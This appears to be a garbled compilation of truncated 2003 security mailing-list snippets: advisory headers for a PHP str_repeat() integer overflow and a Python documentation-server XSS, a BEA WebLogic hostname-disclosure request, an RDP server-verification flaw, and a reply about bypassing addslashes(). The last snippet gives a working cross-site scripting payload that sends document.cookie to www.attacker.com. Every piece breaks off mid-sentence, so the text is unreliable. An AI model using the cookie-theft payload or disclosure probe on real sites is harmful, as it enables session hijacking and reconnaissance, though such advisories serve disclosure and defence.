//(#) Mordred Security Labs advisory
Release date: April 1, 2003
Name: Integer overflow in PHP str_repeat() function
Versions affected: all versions
Risk: average
Author: Sir Mordred ([EMAIL PROTECTED])
I. Description:
PHP is a widely-used general-purpose scripting language that is
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS in Python Documentation Server
product: Python 2.2.2 and 2.3a2 for Win32
vendor: http://www.python.org
risk: low
date: 04/02/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls:
Hi,
During a penetration test, I discovered that the BEA Weblogic Server
reveals its hostname (on Windows machines, the NetBIOS name) while sending the
following request:
GET . HTTP/1.0\r\n\r\n
On older systems (Weblogic 7.0), a simple BLAH . BLAH\r\n\r\n will do
the same trick. BEA was
During extensive investigation of the Remote Desktop Protocol (RDP),
the protocol used to connect to Windows Terminal Services, we (Cendio
Systems) have found that although the information sent over the network is
encrypted, there is no verification of the identity of the server when
setting up
I haven't tested but I don't think addslashes() is a good solution here.
The same javascript can be executed without ' or , like this :
<form name=a><input type=hidden name=u
value=http://www.attacker.com/prova.php></form>
<script>window.open(document.a.u.value+document.cookie)</script>
What do